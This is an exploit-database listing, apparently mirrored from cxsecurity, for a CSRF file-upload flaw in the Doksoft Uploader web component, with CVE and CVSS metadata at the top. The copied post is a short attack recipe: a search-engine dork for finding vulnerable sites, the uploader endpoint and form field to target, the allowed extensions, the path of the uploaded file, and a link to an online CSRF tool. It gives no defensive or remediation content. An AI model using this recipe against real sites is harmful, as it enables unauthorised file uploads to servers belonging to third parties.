Advertisement






Doksoft Uploader CSRF File Upload

CVE Category Price Severity
CVE-2021-3456 CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-12-03
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 0.85521 0.97585

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120001

Below is a copy:

Doksoft Uploader CSRF File Upload
Dork: inurl:/doksoft_uploader/userfiles/
Author: L4663r666h05t
Thanks: Bivokids - Manadoghost - Indonesian Code Party

Exploit: /doksoft_uploader/uploader.php?type=Files
CSRF post files: files[]

Allowed files extension:
7z, aiff, asf, avi, bmp, csv, doc, docx, fla
flv, gif, gz, gzip, jpeg, jpg, mid, mov, mp3
mp4, mpc, mpeg, mpg, ods, odt, pdf, png, ppt
pptx, pxd, qt, ram, rar, rm, rmi, rmvb, rtf
sdc, sitd, swf, sxc, sxw, tar, tgz, tif, tiff
txt, vsd, wav, wma, wmv, xls, xlsx, zip

Path File: /doksoft_uploader/userfiles/files.jpg

CSRF: http://v1.exploits.my.id/?tools=csrf

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.